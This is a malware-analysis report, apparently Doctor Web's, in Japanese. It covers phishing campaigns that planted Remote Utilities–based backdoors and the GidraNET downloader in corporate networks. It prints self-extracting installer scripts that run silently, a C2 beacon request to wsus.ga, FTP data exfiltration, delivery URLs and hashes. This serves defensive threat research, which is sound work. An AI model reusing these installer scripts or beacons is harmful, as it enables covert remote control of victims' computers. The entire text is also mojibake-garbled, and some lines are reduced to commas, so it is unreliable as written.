2020幎11æãDoctor Webã®ãŠã€ã«ã¹ç ç©¶æã¯ãäŒæ¥ãŠãŒã¶ãŒãžã®ãã£ãã·ã³ã°ã¡ãŒã«ã®é åžãæ€åºããŸãããæ»æè ã¯ãå€å žçãªãœãŒã·ã£ã«ãšã³ãžãã¢ãªã³ã°ææ³ã䜿çšããŠãæœåšçãªè¢«å®³è ã«æ·»ä»ãã¡ã€ã«ãéãããããšããŸãããé»åã¡ãŒã«ã«ã¯ãæªæã®ããããŒããšããŠããã€ã®æšéЬãå«ãŸããŠããŸãããããã«ããããªã¢ãŒããŠãŒãã£ãªãã£ãŠãŒãã£ãªãã£ã®é衚瀺ã®ã€ã³ã¹ããŒã«ãšèµ·åãä¿èšŒããããã®ã€ã³ã¹ããŒã«ã³ã³ããŒãã³ããæ·»ä»ãã¡ã€ã«ã«å«ãŸããŠããŸãããäžå©ãªç¶æ³ã§ã¯ãããã°ã©ã ã®æäœãèŠèŠçã«ç€ºãããšãªããåŸæ¥å¡ã®ã³ã³ãã¥ãŒã¿ãŒããªã¢ãŒãå¶åŸ¡ã§ããããã«ãªããŸãããã®èšäºã§ã¯ã䜿çšãããŠããRATããã€ã®æšéЬã®ååžãšææã®ã¡ã«ããºã ãèŠãŠãããŸãã
æ»æã·ããªãª
ç§ãã¡ãèŠã€ãããµã³ãã«ã¯2ã€ã®ã°ã«ãŒãã«åããããšãã§ããŸãã
- , Remote Utilitites , DLL Hijacking. , . Dr.Web BackDoor.RMS.180.
- , Remote Utilities MSI-, . Dr.Web BackDoor.RMS.181.
ãã«ãŠã§ã¢ã®äž¡æ¹ã®ã°ã«ãŒãã¯ã䜿çšãããããŒã«ïŒRemote UtilitiesïŒã ãã§ãªãããã£ãã·ã³ã°ã¡ãŒã«ã®åœ¢åŒã«ãã£ãŠãçµ±åãããŠããŸãããããã¯ãåä¿¡è ã«ãšã£ãŠæœåšçã«è峿·±ããããã¯ã䜿çšããããã·ã¢èªã§ããªãããæžãããæ¯èŒçããªã¥ãŒã ã®ããã¡ãã»ãŒãžã§ããæªæã®ãããã€ããŒãã¯ãã¹ã¯ãŒãã§ä¿è·ãããŠãããTXTãã¡ã€ã«åœ¢åŒã®ãã¹ã¯ãŒãèªäœãè¿ãã«ãããæçŽãéä¿¡ãããæ¥ä»ã衚ããŠããŸãã
DLLãã€ãžã£ãã¯ã䜿çšããæªæã®ããæ·»ä»ãã¡ã€ã«ãå«ãã¡ãã»ãŒãžã®äŸïŒ
æ·»ä»ãããã¢ãŒã«ã€ãã«ã¯ãä¿è·ãããRARã¢ãŒã«ã€ããšãã¹ã¯ãŒãä»ãã®ããã¹ããã¡ã€ã«ãå«ãŸããŠããŸãã
éä¿¡ãããæ·»ä»ãã¡ã€ã«ã®æ©å¯æ§ã®ããã«ãèªåãã¹ã¯ãŒããèšå®ãããŸãïŒ02112020ã
ã¢ãŒã«ã€ãã«ã¯ãèªå·±æœåºRARã®åœ¢åŒã®ãããããŒãå«ãŸããŠããããã®å éšã«ã¯BackDoor.RMS.180èªäœããã ãŸãã
以äžã¯ãMSIããã±ãŒãžã䜿çšããæ·»ä»ãã¡ã€ã«ä»ãã®é»åã¡ãŒã«ã®äŸã§ãã
æªæã®ããè² è·ã®ããã¢ãŒã«ã€ãïŒ BackDoor.RMS.181ïŒãšãã¹ã¯ãŒããã¡ã€ã«ã«å ããŠãããã«ã¯ãããŒã®ããã¥ã¡ã³ãããããŸãã
äŒæ¥ã®ã»ãã¥ãªãã£ããªã·ãŒã«ããããã®æ·»ä»ãã¡ã€ã«ã¯ã¢ã¯ã»ã¹ã³ãŒã12112020ã§ä¿è·ãããŠããŸãã
調æ»äžã«ãæ§ææžã¿ã®MSIããã±ãŒãžïŒDr.Webã«ãã£ãŠBackDoor.RMS.187ãšããŠæ€åºïŒãããªã¢ãŒããŠãŒãã£ãªãã£ãŠãŒãã£ãªãã£ã®ã€ã³ã¹ããŒã«ãèµ·åãããããããŒãžã®ãªã³ã¯ãå«ããã£ãã·ã³ã°ã¡ãŒã«ã®ãµã³ãã«ãèŠã€ãããŸãã ãããã§ã¯ããããã«ç°ãªããã€ããŒãäŒæã¡ã«ããºã ãé¢ä¿ããŠããŸãã
ãCV_resume.rarãã¯ã䟵害ããããµã€ããžã®ãªã³ã¯ã§ãããããããå¥ã®ãªãœãŒã¹ãžã®ãªãã€ã¬ã¯ããçºçããŠãBackDoor.RMS.187ããæªæã®ããã¢ãŒã«ã€ããããŠã³ããŒãããŸã ã
ãµã€ããŒç¯çœªè ãBackDoor.RMS.187ãé åžããããã«äœ¿çšãããããã¯ãŒã¯ã€ã³ãã©ã¹ãã©ã¯ãã£ã®åæã«ããã ããã«ããã€ãã®äŸµå®³ããããµã€ããšãTrojan.Gidraã®ãµã³ãã«ãæããã«ãªããŸãããç§ãã¡ã®ããŒã¿ã«ãããšã Trojan.GidraNET.1ã¯ãæåã«ãã£ãã·ã³ã°ã¡ãŒã«ã䜿çšããŠã·ã¹ãã ã«ææããç¶ããŠRemoteUtiltiesãå¯ãã«ã€ã³ã¹ããŒã«ããããã¯ãã¢ãããŠã³ããŒãããããã«äœ¿çšãããŸããã
æ€åºããããœãããŠã§ã¢ã®ã¢ã«ãŽãªãºã ã®è©³çްãªåæã«ã€ããŠã¯ãåœç€Ÿã®Webãµã€ãã®ãŠã€ã«ã¹ã©ã€ãã©ãªããèªã¿ ãã ããã以äžã§ã¯ããããã®ãã«ãŠã§ã¢ã«ã€ããŠç°¡åã«èª¬æããŸãã
BackDoor.RMS.180
ãªã¢ãŒããŠãŒãã£ãªãã£ã³ã³ããŒãã³ãã䜿çšããŠäœæãããããã¯ãã¢ããã€ã®æšéЬãäž»ãªæªæã®ããã¢ãžã¥ãŒã«ã¯ãDLLãã€ãžã£ãã¯ãä»ããŠããŒããããŸãã
èªå·±æœåºã¢ãŒã«ã€ãã¯ã次ã®ã¹ã¯ãªããã«ãã£ãŠèµ·åãããŸãã
;Ñ Ñ SFX-
Path=%APPDATA%\Macromedia\Temp\
Setup=WinPrint.exe
Silent=1
Overwrite=2
èªå·±æœåºãããããŒçµæç©ïŒ
- libeay32.dllïŒf54a31a9211f4a7506fdecb5121e79e7cdc1022eïŒãã¯ãªãŒã³;
- ssleay32.dllïŒ18ee67c1a9e7b9b82e69040f81b61db9155151abïŒãã¯ãªãŒã³;
- UniPrint.exeïŒ71262de7339ca2c50477f76fcb208f476711c802ïŒãæå¹ãªçœ²åã§çœ²åãããŠããŸãã
- WinPrint.exeïŒ3c8d1dd39b7814fdc0792721050f953290be96f8ïŒãæå¹ãªçœ²åã§çœ²åãããŠããŸãã
- winspool.drvïŒc3e619d796349f2f1efada17c9717cf42d4b77e2ïŒã¯ããªã¢ãŒããŠãŒãã£ãªãã£ã®é ãããæäœãä¿èšŒããäž»ãªæªæã®ããã¢ãžã¥ãŒã«ã§ãã
ãšã¯ã¹ããŒãããã颿°ã®ããŒãã«winspool.drvïŒ
118 RemoveYourMom
119 AddFormW
144 ClosePrinter
148 OpenDick
156 DeleteFormW
189 DocumentPropertiesW
190 HyXyJIuHagoToA
195 EnumFormsW
203 GetDefaultPrinterW
248 EnumPrintersW
273 GetFormW
303 OpenPrinterW
307 PrinterProperties
å ã®winspool.drvã¢ãžã¥ãŒã«ã«ååšãããæ©èœã®è² è·ããªã颿°ïŒ
å®åã®ãšã¯ã¹ããŒãã«ã¯ãæ£èŠã®ã©ã€ãã©ãªããå°æ¥ããŒããããå ã®é¢æ°ãžã®é·ç§»ãå«ãŸããŸãã
äžéšã®API颿°ã¯ããžã£ã³ããŒãžã®ãã€ã³ã¿ãŒãä»ããŠå®è¡ãããŸã ãget_proc
颿° ã¯ãã¢ãžã¥ãŒã«ã®ãšã¯ã¹ããŒãããŒãã«ãè§£æããŠãå¿ èŠãªAPI颿°ãæ¢ãããžã£ã³ã颿°ã®ä»£ããã«èŠã€ãã£ãã¢ãã¬ã¹ãé 眮ããŸãã
æåã®æ®µéã§ã眮ãæããããã©ã€ãã©ãªãããŒãããŸããååã¯ããŒãã³ãŒããããŠããªããããã©ã€ãã©ãª<system_directory> \ <module_filename>ãããŒãããŸã ..ãæ¬¡ã«ããšã¯ã¹ããŒãããŒãã«ã調ã¹ãŠãå ã®API颿°ãéåžžã©ããã«ããŒãããç¡å¹ãªé¢æ°ãã¹ãããããŸãã
RemoveYourMom OpenDick HyXyJIuHagoToA
次ã«ãããã¯ãã¢ã¯ãå®è¡äžã®å®è¡å¯èœãã¡ã€ã«ã®ã³ã³ããã¹ãããã§ãã¯ããŸãããããè¡ãããã«ãã¡ã€ã³å®è¡å¯èœã¢ãžã¥ãŒã«ã®å€IMAGE_NT_HEADERS.OptionalHeader.CheckSumããã§ãã¯ã ãŸãã
- å€ã¯0x2ECF3 -WinPrint.exeã§ã®æåã®èµ·åã
- å€ã¯0xC9FBD1 - UniPrint.exeã®ã³ã³ããã¹ãã§åäœããŸãã
WinPrint.exeãå®è¡ãããŠããå Žåãããã¯ãã¢ã¯UniPrint.exeããã»ã¹ãäœæããçµäºããŸãã
UniPrint.exeãèµ·åãããšãããã¯ãã¢ã¯åºæ¬çãªæ©èœã®å®è¡ã«é²ã¿ãŸãããŠãŒã¶ãŒã«ç®¡çè ã¢ã¯ã»ã¹æš©ããããã©ããã確èªããŸããæ¬¡ã«ãã¢ãžã¥ãŒã«ã䜿çšããŠãã£ã¬ã¯ããªã®ã¢ã¯ã»ã¹èš±å¯ãèšå®ããŸãã
ãã®åŸãGeneralãã©ã¡ãŒã¿ãš Securityãã©ã¡ãŒã¿ ã HKCU \ SOFTWARE \ WDMPrintã¬ãžã¹ããªããŒã«æžã蟌ã¿ããã©ãŒãããæååã䜿çšããŠInternetIDãã©ã¡ãŒã¿å€ãæºåã ãŸãã
ãããŠãããã¯ãã¢ã¯é ãäœæ MDICLIENTãš RMSHDNLTãŠã£ã³ããŠãïŒ
次ã«ãAPI颿°ã®ã€ã³ã¿ãŒã»ããã«é²ã¿ãŸããããã«ã¯MinHookã©ã€ãã©ãªã䜿çšã ãŸãã
ååããã颿°ã®èª¬æãå«ã詳现ãªè¡šã¯ãåœç€Ÿã®Webãµã€ãã®BackDoor.RMS.180ããŒãž ã«ãããŸãã
ããã¯ãã¢ãããã¯ãŒã¯ã¢ã¯ãã£ããã£ã¯ã次ã®ããã«å®è£ ãããŸãããŸããGetWindowTextA颿°ã䜿çšããŠTEditãŠã£ã³ã㊠ãã³ãã«ã䜿çšãã ãšãããã¯ãã¢ã¯ãªã¢ãŒãæ¥ç¶ã«å¿ èŠãªInternetIDãååŸã ãŸããæ¬¡ã«ã次ã®åœ¢åŒã®GETèŠæ±ã圢æããŸãã
GET /command.php?t=2&id=<Internet-ID> HTTP/1.1
Host: wsus.ga
Accept-Charset: UTF-8
User-Agent: Mozilla/5.0 (Windows NT)
Connection: close
次ã«ãTCPãœã±ãããäœæããŸããSSLæ¥ç¶ã®ããŒããæ ŒçŽããã°ããŒãã«å€æ°ã®å€ããã§ãã¯ããŸãïŒãã®äŸã§ã¯ãŒãïŒãããŒãããŒãã«çãããªãå Žåãæ¥ç¶ã¯SSLEAY32.dllã©ã€ãã©ãªã®æ©èœã䜿çšããŠSSLçµç±ã§è¡ãããŸããããŒããæå®ãããŠããªãå Žåãããã¯ãã¢ã¯ããŒã80ãä»ããŠæ¥ç¶ããŸã
ãæ¬¡ã«ãçæãããèŠæ±ãéä¿¡ããŸããå¿çãåä¿¡ãããšã1åéåŸ æ©ããInternetIDã䜿çšããŠèŠæ±ãåéä¿¡ã ãŸããåçããªãå Žåã¯ã2ç§åŸã«ãªã¯ãšã¹ããç¹°ãè¿ãããŸããéä¿¡ã¯ç¡éã®ã«ãŒãã§çºçããŸãã
BackDoor.RMS.181
åæããããµã³ãã«ã¯ããªã¢ãŒããŠãŒãã£ãªãã£ãã¥ãŒã¢ããMSIã³ã³ãã£ã®ã¥ã¬ãŒã¿ã䜿çšããŠäœæããããäºåèšå®ããããªã¢ãŒãã³ã³ãããŒã«ãã©ã¡ãŒã¿ãåããMSIããã±ãŒãžã§ããèªå·±æœåºå7zãããããŒïŒ52c3841141d0fe291d8ae336012efe5766ec5616ïŒã®äžéšãšããŠé åžãããŸããã
ã¹ãã€ãçµæïŒ
- host6.3_mod.msiïŒäºåæ§æãããMSIããã±ãŒãžïŒ;
- æå¹ãªããžã¿ã«çœ²åã§çœ²åãããinstaller.exeïŒ5a9d6b1fcdaf4b2818a6eeca4f1c16a5c24dd9cfïŒã
èªå·±æœåºã¢ãŒã«ã€ãèµ·åã¹ã¯ãªããïŒ
;!@Install@!UTF-8!
RunProgram="hidcon:installer.exe /rsetup"
GUIMode="2"
;!@InstallEnd@!
è§£ååŸããããããŒã¯installer.exeãã¡ã€ã«ãå®è¡ããŸããããã«ãããäºåæ§æãããMSIããã±ãŒãžã®ã€ã³ã¹ããŒã«ãéå§ãããŸããã€ã³ã¹ããŒã©ãŒã¯ãªã¢ãŒããŠãŒãã£ãªãã£ãæœåºããŠå¯ãã«ã€ã³ã¹ããŒã«ããŸããã€ã³ã¹ããŒã«åŸã管çãµãŒããŒã«ä¿¡å·ãéä¿¡ããŸãã
MSIããã±ãŒãžã«ã¯ããªã¢ãŒããŠãŒãã£ãªãã£ããµã€ã¬ã³ãã€ã³ã¹ããŒã«ããããã«å¿ èŠãªãã¹ãŠã®ãã©ã¡ãŒã¿ãå«ãŸããŠããŸããã€ã³ã¹ããŒã«ã¯ã ããã°ã©ã ãã¡ã€ã«\ãªã¢ãŒããŠãŒãã£ãªãã£-ãã£ã¬ã¯ããªããŒãã«ã«åŸã£ãŠãã¹ãã§å®è¡ãããŸã ã CustomAction
ããŒãã«ã«ãããšã msiexec.exeã€ã³ã¹ããŒã©ãŒã¯ãªã¢ãŒããŠãŒãã£ãªãã£ããã±ãŒãžrutserv.exeã®ã¡ã€ã³ã³ã³ããŒãã³ããèµ·åã ãŸãããµã€ã¬ã³ãã€ã³ã¹ããŒã«ãæäŸããããŸããŸãªãã©ã¡ãŒã¿ã䜿çšããŠããã¡ã€ã¢ãŠã©ãŒã«ã«ãŒã«ã远å ãããµãŒãã¹ãéå§ããŸãã
æ¥ç¶ãã©ã¡ãŒã¿ãšèšå®ã¯ãHKLM \ Remote Utilities \ v4 \ Server \ Parametersã¬ãžã¹ããªããŒã«å ¥åãããŸã ããã©ã¡ãŒã¿å€ã¯RegistryããŒãã«ã«å«ãŸããŠããŸã ïŒ CallbackSettings
ãã©ã¡ãŒã¿ ã«ã¯ãçŽæ¥æ¥ç¶ã®ããã«InternetIDãéä¿¡ããããµãŒããŒã®ã¢ãã¬ã¹ãå«ãŸããŠããŸã ã
BackDoor.RMS.187
調æ»ãããµã³ãã«ã¯ããªã¢ãŒããŠãŒãã£ãªãã£ããµã€ã¬ã³ãã€ã³ã¹ããŒã«ããŠå®è¡ããããã®ãã©ã¡ãŒã¿ãäºåèšå®ãããMSIããã±ãŒãžã§ããããã¯ããã£ãã·ã³ã°ã¡ãŒãªã³ã°ãªã¹ãã«ãã£ãŠæªæã®ããRARã¢ãŒã«ã€ãã®äžéšãšããŠé åžãããŸããã
ããã¯ãLOGãšããååã§ãªãœãŒã¹ã»ã¯ã·ã§ã³ã«ã€ã³ã¹ããŒã«ã¢ãŒã«ã€ããæ ŒçŽãããããããŒã䜿çšããŠèµ·åãããŸã ããããããŒã¯ãMSIããã±ãŒãžãKB8438172.msiãšããååã§ïŒ TEMPïŒ ãã£ã¬ã¯ããªã«ä¿å ããã€ã³ã¹ããŒã©ãŒã䜿çšããŠmsiexec.exeãèµ·åããŸãããããããŒã«ã¯ããœãŒã¹ãžã®ãã¹ãå«ãŸããŠããŸã -CïŒ\ Users \ Kelevra \ Desktop \ Source \ Project1.vbpã
ããã¯ãã¢ã¯ãcerbe [@] Protonmail [ã] Comã«ã¡ãã»ãŒãžãéä¿¡ããããšã«ãããæ¥ç¶ã®æºåãã§ããŠããããšã瀺ããŸã ã..ã
ãã®ãµã³ãã«ã¯ãé åžæ¹æ³ã§æ³šç®ã«å€ããŸãã被害è ã¯ããŠãŒã¶ãŒãå¿ èŠãšããæ·»ä»ãã¡ã€ã«ãè£ ã£ããªã³ã¯ãèšèŒããããã£ãã·ã³ã°ã¡ãŒã«ãåãåããŸãã
æ·»ä»ãã¡ã€ã«ãããŠã³ããŒãããããã®ãªã³ã¯ã§ãã HTTP [ïŒ] // RU ateliemilano / STAT / amsweb.php eTmt6lRmkrDeoEeQB6MOVIKq4BTmbNCaI6vjïŒ 2FvgYEbHFcfWecHRVZGMpkKïŒ 2BMqevriOYlq9CFe6NuQMfKPsSNIax3bNKkCaPPR0RA85HY4BuïŒ 2BïŒ 2B6xw2oPITBvntn2dh0QCN9pV5fzq3T 2FnW270rsYkctA %%% 2FwdvWH1bkEt2AdWnyEfaOwsKsSpyY3azVX0D 2BKOm5 [ã]ïŒ ã
次ã«ããã®ã¢ãã¬ã¹ãããã¢ãã¬ã¹https [ïŒ] // kiat [ã]ãžã®ãªãã€ã¬ã¯ã ãçºçããŸããBy/ recruitment / CV_Ekaterina_A_B_resume.rarã¯ãæªæã®ããã¢ãŒã«ã€ãã®ããŠã³ããŒãã«äœ¿çšãããŸãã
ateliemilano [ã] ruããã³ kiat [ã] byã¯æ¢åã®ãµã€ãã§ããã2çªç®ã®ãµã€ãã¯æ¡çšæ©é¢ãææããŠããŸããç§ãã¡ã®æ å ±ã«ãããšããããã¯ããã€ã®æšéЬãããŠã³ããŒãããããã«ããããŠããããããŠã³ããŒãããããã®èŠæ±ã転éããããã«ç¹°ãè¿ã䜿çšãããŠããŸããã
調æ»ã®éçšã§ãMSIããã±ãŒãžã§åæ§ã®ãããããŒãé åžããããã«äœ¿çšãããä»ã®äŸµå®³ããããµã€ããèŠã€ãããŸããããããã®ããã€ãã§ã¯ãateliemilano [ã] Ruãµã€ããšåã圢åŒã®ãªãã€ã¬ã¯ããã€ã³ã¹ããŒã«ãããŸãã ã
Visual Basic .NETã§èšè¿°ãããããã€ã®æšéЬ ïŒ Trojan.GidraNET.1ïŒãç¹ã«ãæªæã®ãããããããŒã䟵害ãããã³ã³ãã¥ãŒã¿ãŒã«ããŠã³ããŒãããŸãã
Trojan.GidraNET.1
調æ»ããããã€ã®æšéЬã®ãµã³ãã«ã¯ã䟵害ããããµã€ããä»ããŠé åžãããŸãããããã¯ãã·ã¹ãã ã«é¢ããæ å ±ãåéãããã®åŸFTPãä»ããŠãµã€ããŒç¯çœªè ã«è»¢éããããã«èšèšãããŠããŸãããŸãããªã¢ãŒããŠãŒãã£ãªãã£ãã€ã³ã¹ããŒã«ããããã®MSIããã±ãŒãžãå«ãæªæã®ãããããããŒãããŠã³ããŒãããããã«èšèšãããŠããŸãã
äž»ãªæ©èœã¯ãForm1_LoadããåŒã³åºããã readConfigã¡ãœããã«ãã ãŸãã äœæ¥ã®éå§æã«ãã·ã¹ãã ã«é¢ããæ¬¡ã®æ å ±ãåéããŸãã
- å€éšIPã¢ãã¬ã¹ã
- ãŠãŒã¶ãŒå;
- PCå;
- OSããŒãžã§ã³;
- ãã¶ãŒããŒããšããã»ããµã«é¢ããæ å ±ã
- RAMã®éã
- ãã£ã¹ã¯ãšããŒãã£ã·ã§ã³ã«é¢ããæ å ±ã
- ãããã¯ãŒã¯ã¢ããã¿ãšãã®MACã¢ãã¬ã¹ã
- ã¯ãªããããŒãã®å 容ã
çµæã®æ å ±ã¯ãã¡ã€ã«ã«ä¿åãããã¹ã¯ãªãŒã³ã·ã§ãããæ®ããŸãã
ã·ã¹ãã ã«é¢ããæ å ±ãFTPçµç±ã§ãµãŒããŒateliemilano [ã] Ruã«éä¿¡ããŸã ã
ãã®ããã€ã®æšéЬã®ã³ãŒãã«ã¯ãFTPãµãŒããŒã®ãã°ã€ã³ãšãã¹ã¯ãŒããå«ãŸããŠããŸããææããã³ã³ãã¥ãŒã¿ããšã«åå¥ã®ãã£ã¬ã¯ããªãäœæãããŸãã
æ å ±ãéä¿¡ããåŸãå¥ã®äŸµå®³ããããµãŒããŒãããã¡ã€ã«ãããŠã³ããŒãããŠå®è¡ããŸãã
åæ§ã®ãµã³ãã«ã§ããŠã³ããŒãããããã¡ã€ã«ã¯ãBackDoor.RMS.187ãªã©ã®ãªã¢ãŒããŠãŒãã£ãªãã£ã®é衚瀺ã€ã³ã¹ããŒã«çšã®MSIããã±ãŒãžãå«ãVisualBasicã§èšè¿°ããããããããŒã§ã ã
PDBãã¡ã€ã«ãžã®ãã¹ã¯ã調æ»ãããµã³ãã«ã§èŠã€ãããŸããã CïŒ\ Users \ Kelevra \ Desktop \ Last Gidra + PrintScreen + Loader_ Main \ Gidra \ obj \ Debug \ Gidra.pdbãKelevraã®ãŠãŒã¶ãŒåã¯ãBackDoor.RMS.187ãããããŒã®ãããžã§ã¯ããã¡ã€ã«ãžã®ãã¹ã«ãããŠãŒã¶ãŒåãšåãã§ã ãCïŒ\ Users \ Kelevra \ Desktop \ Source \ Project1.vbpãä»ã®å€çš®ãåæ§ã®ãµã³ãã«ã§èŠã€ãããŸããã
ç§ãã¡ãèŠã€ããæ å ±ã«åºã¥ããŠã2019幎ã«Trojan.GidraNET.1ã®äœæè ããã®ããã€ã®æšéЬããã£ãã·ã³ã°ã¡ãŒã«ã«ããæåã®ææã«äœ¿çšããç¶ããŠRemoteUtiltiesãå¯ãã«ã€ã³ã¹ããŒã«ããããã¯ãã¢ãããŠã³ããŒããããšæšæž¬ã§ã ãŸãã
çµè«
ãªã¢ãŒã管çãŠãŒãã£ãªãã£ã«åºã¥ãããã¯ãã¢ã¯ãäŸç¶ãšããŠéèŠãªã»ãã¥ãªãã£ã®è åšã§ãããäŒæ¥ã»ã¯ã¿ãŒãæ»æããããã«åŒãç¶ã䜿çšãããŠããŸããåæ§ã«ããã£ãã·ã³ã°ã¡ãŒã«ã¯ãææããã³ã³ãã¥ãŒã¿ãŒã«ãã€ããŒããé ä¿¡ããäž»ãªææ®µã§ããæªæã®ããæ·»ä»ãã¡ã€ã«ã®ç¹åŸŽçãªæ©èœã¯ããã¹ã¯ãŒãã䜿çšããŠãã€ããŒããã¢ãŒã«ã€ãããããšã§ããããã«ãããã¡ãã»ãŒãžã¯ã¡ãŒã«ãµãŒããŒã«çµã¿èŸŒãŸããŠããä¿è·ãå æã§ããŸãããã1ã€ã®æ©èœã¯ãåœã®ã¢ãŒã«ã€ãã®ãã¹ã¯ãŒããå«ãããã¹ããã¡ã€ã«ã®ååšã§ããããã«ãæªæã®ããã©ã€ãã©ãªãšDLLãã€ãžã£ãã¯æ»æã䜿çšãããšã䟵害ãããããã€ã¹äžã§ãªã¢ãŒãã³ã³ãããŒã«ãœãããŠã§ã¢ã®é ãããæäœãå¯èœã«ãªããŸãã
劥åã®ææš